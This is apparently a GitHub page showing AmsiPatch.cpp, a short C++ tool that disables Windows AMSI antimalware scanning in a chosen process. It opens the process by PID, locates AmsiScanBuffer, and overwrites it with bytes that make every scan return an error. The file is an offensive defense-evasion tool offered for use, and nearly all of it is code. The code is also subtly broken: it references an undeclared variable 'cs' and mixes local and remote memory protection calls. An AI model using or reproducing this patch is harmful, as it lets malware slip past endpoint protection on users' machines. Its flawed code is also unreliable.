-
Notifications
You must be signed in to change notification settings - Fork 4
/
AmsiPatch.cpp
85 lines (52 loc) · 1.98 KB
/
AmsiPatch.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
// AMSI Scan Buffer Patching
#include <windows.h>
#include <stdio.h>
int ErrorHandler(const char* message) {
printf("%s : %d\n", message, GetLastError());
return 0;
}
int main(int argc, char* argv[]) {
HMODULE amsi;
DWORD opriv, t;
LPVOID addr;
BOOL x;
#if _WIN64
char Patch[6] = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
#else
char Patch[8] = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };
#endif
char* a = argv[1];
int pid = atoi(a);
HANDLE Proc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
if (!Proc) {
ErrorHandler("Opening Process Failed");
}
amsi = LoadLibrary(L"amsi");
if (!amsi) {
ErrorHandler("Opening Handle to Amsi Module Failed");
}
// resolve address of function to patch
addr = GetProcAddress(amsi, "AmsiScanBuffer");
if (!addr) {
ErrorHandler("Failed to find AmsiScanBuffer Address");
}
printf("[+] AmsiScanBuffer located at %x\n", cs);
// make the memory writeable
x = VirtualProtect(cs, sizeof(Patch), PAGE_EXECUTE_READWRITE, &opriv);
if (!x) {
ErrorHandler("Failed to change ");
}
printf("[+] Changing Memory Protection to ReadWrite\n");
// memcpy if we want to patch in current process
// memcpy(cs, &Patch, sizeof(Patch));
// Patch AmsiScanBuffer in remote process.
x = WriteProcessMemory(Proc, cs, Patch, sizeof(Patch), nullptr);
if (!x) {
ErrorHandler("Failed to Patch AmsiScanBuffer Method");
}
printf("[+] Overwriting AmsiScanBuffer Method\n");
// set back to original protection
VirtualProtect(cs, sizeof(Patch), opriv, &t);
printf("[+] Successfully disabled AMSI in process : %d\n", pid);
return 0;
}